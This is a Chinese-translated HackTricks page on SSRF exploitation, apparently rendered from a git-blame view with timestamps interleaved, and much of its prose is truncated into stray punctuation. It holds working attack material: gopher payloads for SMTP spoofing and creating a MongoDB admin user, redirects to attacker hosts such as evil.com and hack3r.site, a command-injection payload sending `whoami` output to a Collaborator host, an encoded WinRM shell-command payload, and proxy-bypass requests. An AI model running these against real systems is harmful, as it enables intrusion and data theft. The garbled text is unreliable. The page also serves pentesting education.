2024-02-05 20:18:17 +00:00
# SSRF( )
2022-04-28 16:01:33 +00:00
2024-03-17 16:19:28 +00:00
< figure > < img src = "../../.gitbook/assets/image (3) (1) (1) (1) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-09-01 23:40:55 +00:00
2024-02-05 20:18:17 +00:00
\
2024-03-25 01:49:14 +00:00
使用[**Trickest**](https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks)轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。\
2023-08-03 19:12:22 +00:00
立即获取访问权限:
2022-09-01 23:40:55 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}
2022-04-28 16:01:33 +00:00
< details >
2024-03-25 01:49:14 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, < / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( ) < / strong > < / a > < strong > ! < / strong > < / summary >
2024-01-01 18:40:45 +00:00
2024-03-25 01:49:14 +00:00
支持HackTricks的其他方式:
2022-04-28 16:01:33 +00:00
2024-03-25 01:49:14 +00:00
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或在**Twitter**上关注我们 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2024-02-05 20:18:17 +00:00
## 基本信息
2024-03-25 01:49:14 +00:00
**服务器端请求伪造( )
2024-02-05 20:18:17 +00:00
2024-03-25 01:49:14 +00:00
## 捕获SSRF
2022-02-13 12:30:13 +00:00
2024-03-25 01:49:14 +00:00
首先, , :
2022-02-13 12:30:13 +00:00
2024-02-05 20:18:17 +00:00
* **Burp Collaborator**
2022-02-13 12:30:13 +00:00
* [**pingb** ](http://pingb.in )
2022-09-01 23:40:55 +00:00
* [**canarytokens** ](https://canarytokens.org/generate )
2022-04-05 22:24:52 +00:00
* [**interractsh** ](https://github.com/projectdiscovery/interactsh )
* [**http://webhook.site** ](http://webhook.site )
* [**https://github.com/teknogeek/ssrf-sheriff** ](https://github.com/teknogeek/ssrf-sheriff )
2024-02-05 20:18:17 +00:00
* [http://requestrepo.com/ ](http://requestrepo.com/ )
* [https://github.com/stolenusername/cowitness ](https://github.com/stolenusername/cowitness )
2024-03-25 01:49:14 +00:00
* [https://github.com/dwisiswant0/ngocok ](https://github.com/dwisiswant0/ngocok ) - 使用ngrok的Burp Collaborator
2022-02-13 12:30:13 +00:00
2024-01-01 18:40:45 +00:00
## 绕过白名单域
2022-02-13 12:30:13 +00:00
2024-03-25 01:49:14 +00:00
通常, ,
2022-02-13 12:30:13 +00:00
{% content-ref url="url-format-bypass.md" %}
[url-format-bypass.md ](url-format-bypass.md )
{% endcontent-ref %}
2023-08-03 19:12:22 +00:00
### 通过开放重定向绕过
2022-02-13 12:30:13 +00:00
2024-03-25 01:49:14 +00:00
如果服务器受到正确保护,您可以通过利用网页内的开放重定向来**绕过所有限制**。因为网页将允许**对同一域的SSRF**,并且可能会**跟随重定向**,您可以利用**开放重定向**使服务器访问内部任何资源。\
阅读更多信息:[https://portswigger.net/web-security/ssrf](https://portswigger.net/web-security/ssrf)
2022-02-13 12:30:13 +00:00
2023-08-03 19:12:22 +00:00
## 协议
2022-04-29 15:47:17 +00:00
2024-03-16 10:05:11 +00:00
* **file://**
2024-03-25 01:49:14 +00:00
* URL方案`file://`指向`/etc/passwd`:
2024-03-16 10:05:11 +00:00
* **dict://**
2024-03-25 01:49:14 +00:00
* DICT URL方案用于通过DICT协议访问定义或单词列表。给出的示例说明了构建的URL针对特定单词、数据库和条目编号, : < generic_user > ;< auth > @< generic_host > :< port > /d:< word > :< database > :< n > `
2024-03-16 10:05:11 +00:00
* **SFTP://**
2024-03-25 01:49:14 +00:00
* 作为安全文件传输协议的协议, , :
2024-03-16 10:05:11 +00:00
* **TFTP://**
2024-03-25 01:49:14 +00:00
* 提到了通过UDP运行的Trivial File Transfer Protocol, :
2024-03-16 10:05:11 +00:00
* **LDAP://**
2024-03-25 01:49:14 +00:00
* 本部分涵盖了轻量级目录访问协议,
2024-03-16 10:05:11 +00:00
* **SMTP**
2024-03-25 01:49:14 +00:00
* 描述了利用SSRF漏洞与本地主机上的SMTP服务进行交互的方法,
2022-02-13 12:30:13 +00:00
```
2024-02-06 03:43:18 +00:00
From https://twitter.com/har1sec/status/1182255952055164929
2024-02-05 20:18:17 +00:00
1. connect with SSRF on smtp localhost:25
2. from the first line get the internal domain name 220[ http://blabla.internaldomain.com ](https://t.co/Ad49NBb7xy)ESMTP Sendmail
3. search[ http://internaldomain.com ](https://t.co/K0mHR0SPVH)on github, find subdomains
4. connect
2022-02-13 12:30:13 +00:00
```
2024-03-16 10:05:11 +00:00
* **Curl URL globbing - WAF bypass**
* 如果 SSRF 是由 **curl** 执行的, **URL globbing** ](https://everything.curl.dev/cmdline/globbing ) 的功能,可以用来绕过 WAF。例如, **writeup** ](https://blog.arkark.dev/2022/11/18/seccon-en/#web-easylfi ) 中,你可以找到一个关于通过 `file` 协议进行 **路径遍历** 的示例:
2022-02-13 12:30:13 +00:00
```
2024-02-05 20:18:17 +00:00
file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
2022-02-13 12:30:13 +00:00
```
2024-03-16 10:05:11 +00:00
* **Gopher://**
2024-03-25 01:49:14 +00:00
* 讨论了Gopher协议指定IP、端口和字节进行服务器通信的能力, :
2024-02-05 20:18:17 +00:00
2022-09-01 23:40:55 +00:00
### Gopher://
2022-02-13 12:30:13 +00:00
2024-03-25 01:49:14 +00:00
使用该协议,您可以指定要**发送**给服务器的**IP、端口和字节**。然后,
幸运的是,您可以使用[Gopherus](https://github.com/tarunkant/Gopherus)为多个服务创建有效载荷。此外,[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)可用于为Java RMI服务创建_gopher_有效载荷。
2022-02-13 12:30:13 +00:00
2022-04-29 15:47:17 +00:00
**Gopher smtp**
2022-02-13 12:30:13 +00:00
```
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:< hacker @ site . com >
RCPT TO:< victim @ site . com >
DATA
From: [Hacker] < hacker @ site . com >
To: < victime @ site . com >
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AHYou didn't say the magic word !
.
QUIT
```
2024-02-05 20:18:17 +00:00
**Gopher HTTP**
2024-03-25 01:49:14 +00:00
**Gopher HTTP** 是一种利用 Gopher 协议进行 SSRF 攻击的技术。在进行 SSRF 攻击时,攻击者可以构造恶意请求,使目标服务器通过 Gopher 协议访问恶意控制的 Gopher 服务器,从而实现攻击。
2022-02-13 12:30:13 +00:00
```bash
#For new lines you can use %0A, %0D%0A
gopher://< server > :8080/_GET / HTTP/1.0%0A%0A
gopher://< server > :8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body
```
2024-02-05 20:18:17 +00:00
**Gopher SMTP — 反向连接到1337**
2022-02-13 12:30:13 +00:00
{% code title="redirect.php" %}
```php
< ?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>Now query it.
https://example.com/?q=http://evil.com/redirect.php.
```
2024-03-25 01:49:14 +00:00
{% endcode %}
2024-03-16 10:05:11 +00:00
#### Gopher MongoDB -- 使用用户名为admin、密码为admin123且权限为管理员创建用户
```bash
# Check: https://brycec.me/posts/dicectf_2023_challenges#unfinished
curl 'gopher://0.0.0.0:27017/_%a0%00%00%00%00%00%00%00%00%00%00%00%dd%0
7%00%00%00%00%00%00%00%8b%00%00%00%02insert%00%06%00%00%00users%00%02$db%00%0a
%00%00%00percetron%00%04documents%00V%00%00%00%030%00N%00%00%00%02username%00%
06%00%00%00admin%00%02password%00%09%00%00%00admin123%00%02permission%00%0e%00
%00%00administrator%00%00%00%00'
```
2024-03-25 01:49:14 +00:00
## 通过Referrer头部和其他方式进行SSRF攻击
2023-03-05 15:13:44 +00:00
2024-03-25 01:49:14 +00:00
服务器上的分析软件通常记录Referrer头部以跟踪传入链接, ( ) , ,
2023-01-11 11:28:05 +00:00
2024-03-25 01:49:14 +00:00
## 通过证书中的SNI数据进行SSRF攻击
2023-01-11 11:28:05 +00:00
2024-03-25 01:49:14 +00:00
通过一个示例Nginx配置展示了一种可能使连接到任何后端变得简单的错误配置:
2024-02-06 03:43:18 +00:00
```
2023-01-11 11:28:05 +00:00
stream {
2023-08-03 19:12:22 +00:00
server {
listen 443;
resolver 127.0.0.11;
proxy_pass $ssl_preread_server_name:443;
ssl_preread on;
}
2023-01-11 11:28:05 +00:00
}
```
2024-03-25 01:49:14 +00:00
在这个配置中, ( ) ( ) , , :
2023-01-11 11:28:05 +00:00
```bash
2024-02-06 03:43:18 +00:00
openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf
2023-01-11 11:28:05 +00:00
```
2024-03-25 01:49:14 +00:00
## [Wget文件上传](../file-upload/#wget-file-upload-ssrf-trick)
2023-01-11 11:28:05 +00:00
2024-03-17 16:19:28 +00:00
## SSRF与命令注入
2023-01-11 11:28:05 +00:00
2024-03-25 01:49:14 +00:00
值得尝试的有效载荷可能是:`` url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami` ``
2022-02-13 12:30:13 +00:00
2024-03-17 16:19:28 +00:00
## PDF渲染
2022-02-13 12:30:13 +00:00
2024-03-25 01:49:14 +00:00
如果网页自动创建了包含您提供信息的PDF, , ( ) ,
2022-02-13 12:30:13 +00:00
2024-03-17 16:19:28 +00:00
## 从SSRF到DoS
2022-02-13 12:30:13 +00:00
2024-03-17 16:19:28 +00:00
创建多个会话并尝试从会话中利用SSRF下载大文件。
2022-02-13 12:30:13 +00:00
2024-03-17 16:19:28 +00:00
## SSRF PHP函数
2023-01-22 18:27:01 +00:00
{% content-ref url="../../network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md" %}
[php-ssrf.md ](../../network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md )
{% endcontent-ref %}
2024-03-17 16:19:28 +00:00
## SSRF重定向到Gopher
2022-02-13 12:30:13 +00:00
2024-03-17 16:19:28 +00:00
对于某些利用,您可能需要**发送重定向响应**( , ) :
2022-02-13 12:30:13 +00:00
```python
# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
class MainHandler(BaseHTTPRequestHandler):
2023-08-03 19:12:22 +00:00
def do_GET(self):
print("GET")
self.send_response(301)
2024-03-16 10:05:11 +00:00
```html
self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20
2024-03-17 16:19:28 +00:00
```python
2023-08-03 19:12:22 +00:00
self.end_headers()
2022-02-13 12:30:13 +00:00
httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()
```
```python
from flask import Flask, redirect
from urllib.parse import quote
2023-08-03 19:12:22 +00:00
app = Flask(__name__)
@app .route('/')
def root():
return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)
2022-02-13 12:30:13 +00:00
2023-08-03 19:12:22 +00:00
if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
```
2024-03-17 16:19:28 +00:00
< figure > < img src = "../../.gitbook/assets/image (3) (1) (1) (1) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-09-01 23:40:55 +00:00
2023-12-25 17:59:09 +00:00
\
2024-03-25 01:49:14 +00:00
使用[**Trickest**](https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks)可以轻松构建和**自动化工作流**,利用世界上**最先进**的社区工具。\
2023-08-03 19:12:22 +00:00
立即获取访问权限:
2022-09-01 23:40:55 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}
2024-03-25 01:49:14 +00:00
## 配置错误的代理到SSRF
来自[**这篇文章**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)的技巧。
### Flask
< details >
< summary > Flask代理易受攻击的代码< / summary >
```python
from flask import Flask
from requests import get
app = Flask('__main__')
SITE_NAME = 'https://google.com'
@app .route('/', defaults={'path': ''})
@app .route('/< path:path > ')
def proxy(path):
return get(f'{SITE_NAME}{path}').content
if __name__ == "__main__":
app.run(threaded=False)
```
< / details >
Flask允许使用**`@`**作为初始字符,这允许将**初始主机名作为用户名**并注入一个新的。攻击请求:
```http
GET @evildomain .com/ HTTP/1.1
Host: target.com
Connection: close
```
### Spring Boot <a href="#heading-ssrf-on-spring-boot-through-incorrect-pathname-interpretation" id="heading-ssrf-on-spring-boot-through-incorrect-pathname-interpretation"></a>
**易受攻击的代码:**
< figure > < img src = "../../.gitbook/assets/image (729).png" alt = "" > < figcaption > < / figcaption > < / figure >
发现可以通过在请求路径的开头使用字符 ** `;` **,然后使用 ** `@` ** 注入新主机以访问。攻击请求:
```http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
```
### PHP内置Web服务器 <a href="#heading-php-built-in-web-server-case-study-ssrf-through-incorrect-pathname-interpretation" id="heading-php-built-in-web-server-case-study-ssrf-through-incorrect-pathname-interpretation"></a>
< details >
< summary > 受漏洞影响的PHP代码< / summary >
```php
< ?php
$site = "http://ifconfig.me";
$current_uri = $_SERVER['REQUEST_URI'];
$proxy_site = $site.$current_uri;
var_dump($proxy_site);
echo "\n\n";
$response = file_get_contents($proxy_site);
var_dump($response);
?>
```
< / details >
PHP允许在URL路径中的斜杠前使用**字符`*`**,但它有其他限制,比如它只能用于根路径`/`,并且在第一个斜杠之前不允许使用点`.`, , :
```http
GET *@0xa9fea9fe/ HTTP/1.1
Host: target.com
Connection: close
```
2024-03-16 10:05:11 +00:00
## DNS Rebinding CORS/SOP绕过
2022-04-29 15:47:17 +00:00
2024-03-25 01:49:14 +00:00
如果由于CORS/SOP而无法从本地IP中窃取内容, :
2022-04-29 15:47:17 +00:00
{% content-ref url="../cors-bypass.md" %}
[cors-bypass.md ](../cors-bypass.md )
{% endcontent-ref %}
2024-03-16 10:05:11 +00:00
### 自动化DNS Rebinding
2022-04-29 15:51:30 +00:00
2024-03-25 01:49:14 +00:00
[**`Singularity of Origin`** ](https://github.com/nccgroup/singularity )是一个执行[DNS rebinding](https://en.wikipedia.org/wiki/DNS\_rebinding)攻击的工具。它包括重新绑定攻击服务器DNS名称的IP地址到目标机器的IP地址以及提供攻击载荷以利用目标机器上的易受攻击软件所需的组件。
2022-04-29 15:51:30 +00:00
2024-03-17 16:19:28 +00:00
还可以查看在[**http://rebind.it/singularity.html**](http://rebind.it/singularity.html)上公开运行的服务器
2022-04-29 15:51:30 +00:00
2024-03-25 01:49:14 +00:00
## DNS Rebinding + TLS会话ID/会话票据
2022-02-13 12:30:13 +00:00
2023-08-03 19:12:22 +00:00
要求:
2022-02-13 12:30:13 +00:00
* **SSRF**
2024-03-16 10:05:11 +00:00
* **出站TLS会话**
2023-08-03 19:12:22 +00:00
* **本地端口上的内容**
2022-02-13 12:30:13 +00:00
2023-12-25 17:59:09 +00:00
攻击:
2022-02-13 12:30:13 +00:00
2024-03-25 01:49:14 +00:00
1. 要求用户/机器人访问由攻击者控制的**域**
2024-03-17 16:19:28 +00:00
2. **DNS**的**TTL**为**0**秒( )
2024-03-25 01:49:14 +00:00
3. 在受害者和攻击者域之间创建了**TLS连接**。攻击者在**会话ID或会话票据**中引入了**载荷**。
4. **域**将对**自己**启动**无限重定向循环** 。这样做的目的是使用户/机器人访问该域,直到再次执行**域的DNS请求**。
5. 在DNS请求中, ( )
6. 用户/机器人将尝试**重新建立TLS连接**,为此将**发送****会话**ID/票据ID(
2022-02-13 12:30:13 +00:00
2024-03-17 16:19:28 +00:00
请注意, , ( ) , (
2024-03-25 01:49:14 +00:00
要**执行此攻击,可以使用工具**:
2024-02-05 20:18:17 +00:00
要了解更多信息,请查看解释此攻击的讲座:[https://www.youtube.com/watch?v=qGpAJxfADjo\&ab\_channel=DEFCONConference](https://www.youtube.com/watch?v=qGpAJxfADjo\&ab\_channel=DEFCONConference)
2022-02-13 12:30:13 +00:00
2024-03-16 10:05:11 +00:00
## 盲SSRF
2022-02-13 12:30:13 +00:00
2024-03-17 16:19:28 +00:00
盲SSRF与非盲SSRF的区别在于在盲SSRF中您无法看到SSRF请求的响应。因此, ,
2022-02-13 12:30:13 +00:00
2024-03-16 10:05:11 +00:00
### 基于时间的SSRF
2022-02-13 12:30:13 +00:00
2024-03-17 16:19:28 +00:00
通过检查服务器响应的时间,可能可以知道资源是否存在(访问现有资源可能比访问不存在的资源需要更多时间)
2022-02-13 12:30:13 +00:00
2024-03-16 10:05:11 +00:00
## 云SSRF利用
2022-02-13 12:30:13 +00:00
2024-03-25 01:49:14 +00:00
如果在云环境中运行的机器中发现了SSRF漏洞, :
2022-02-13 12:30:13 +00:00
{% content-ref url="cloud-ssrf.md" %}
[cloud-ssrf.md ](cloud-ssrf.md )
{% endcontent-ref %}
2024-03-16 10:05:11 +00:00
## SSRF易受攻击平台
2022-02-13 12:30:13 +00:00
2024-03-25 01:49:14 +00:00
一些已知平台包含或曾包含SSRF漏洞, :
2022-02-13 12:30:13 +00:00
{% content-ref url="ssrf-vulnerable-platforms.md" %}
[ssrf-vulnerable-platforms.md ](ssrf-vulnerable-platforms.md )
{% endcontent-ref %}
2023-08-03 19:12:22 +00:00
## 工具
2022-02-13 12:30:13 +00:00
2022-09-01 23:40:55 +00:00
### [**SSRFMap**](https://github.com/swisskyrepo/SSRFmap)
2022-02-13 12:30:13 +00:00
2024-03-16 10:05:11 +00:00
用于检测和利用SSRF漏洞的工具
2022-02-13 12:30:13 +00:00
2022-09-01 23:40:55 +00:00
### [Gopherus](https://github.com/tarunkant/Gopherus)
2022-02-13 12:30:13 +00:00
2024-03-16 10:05:11 +00:00
* [Gopherus的博客文章 ](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/ )
2022-02-13 12:30:13 +00:00
2024-03-25 01:49:14 +00:00
该工具为以下生成Gopher载荷:
2022-02-13 12:30:13 +00:00
* MySQL
* PostgreSQL
* FastCGI
* Redis
* Zabbix
* Memcache
2022-09-01 23:40:55 +00:00
### [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
2022-02-13 12:30:13 +00:00
2024-03-16 10:05:11 +00:00
* [关于SSRF用法的博客文章 ](https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/ )
2022-02-13 12:30:13 +00:00
2024-03-25 01:49:14 +00:00
_remote-method-guesser_是一个支持大多数常见_Java RMI_漏洞的攻击操作的_Java RMI_漏洞扫描程序。大多数可用操作都支持`--ssrf`选项, ,
2022-02-13 12:30:13 +00:00
2024-03-25 01:49:14 +00:00
### [SSRF Proxy](https://github.com/bcoles/ssrf\_proxy)
2022-02-13 12:30:13 +00:00
2024-03-25 01:49:14 +00:00
SSRF Proxy是一个多线程HTTP代理服务器,
2022-02-13 12:30:13 +00:00
2023-08-03 19:12:22 +00:00
### 练习
2022-02-13 12:30:13 +00:00
{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %}
2024-03-17 16:19:28 +00:00
## 参考资料
2022-02-13 12:30:13 +00:00
* [https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4 ](https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4 )
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery )
2023-01-11 11:28:05 +00:00
* [https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/ ](https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/ )
2024-03-25 01:49:14 +00:00
* [https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies ](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies )
